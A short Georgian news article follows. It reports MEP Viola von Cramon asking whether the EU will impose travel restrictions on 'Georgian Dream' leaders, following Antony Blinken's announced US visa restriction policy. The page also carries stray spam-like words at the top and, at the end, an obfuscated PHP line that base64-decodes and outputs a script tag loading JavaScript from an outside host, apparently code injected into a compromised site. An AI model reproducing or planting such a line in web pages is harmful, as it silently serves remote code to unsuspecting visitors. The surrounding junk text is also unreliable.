celsiusi
ავერსი შნაიდერი

ევროპარლამენტარი ვიოლა ფონ კრამონი საქართველოსთან ორმხრივი თანამშრომლობის გადახედვის შესახებ აშშ-ის სახელმწიფო მდივნის ენტონი ბლინკენის განცხადებას სოციალურ ქსელში ეხმაურება.

„არის შანსი იმისა, რომ ევროკავშირმა ისეთივე სამოგზაურო შეზღუდვები დაუწესოს „ქართული ოცნების“ ლიდერებს, როგორც აშშ-მა გააკეთა? უკიდურესად მნიშვნელოვანი იქნება საქართველოსთან დაკავშირებით ზომების შეთანხმება ჩვენს დასავლელ პარტნიორებთან“, – წერს ვიოლა ფონ კრამონი.

ვიოლა ფონ კრამონს აღნიშნული შეკითხვის ადრესატებად მონიშნული ჰყავს ევროკავშირის ლიდერები, ევროპული საბჭოს პრეზიდენტი შარლ მიშელი, ევროკომისიის პრეზიდენტი ურსულა ფონ დერ ლაიენი და ევროკავშირის უმაღლესი წარმომადგენელი ჯოზეფ ბორელი.

შეგახსენებთ, აშშ-ის სახელმწიფო მდივანმა, ენტონი ბლინკენმა განაცხადა: „სახელმწიფო დეპარტამენტს შემოაქვს საქართველოსთვის სავიზო შეზღუდვის ახალი პოლიტიკა, რომელიც გავრცელდება იმ პირების მიმართ, რომლებიც პასუხისმგებელი ან თანამონაწილეები არიან საქართველოში დემოკრატიის შელახვაზე, ასევე, მათი ოჯახის წევრების მიმართ“. 

136
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");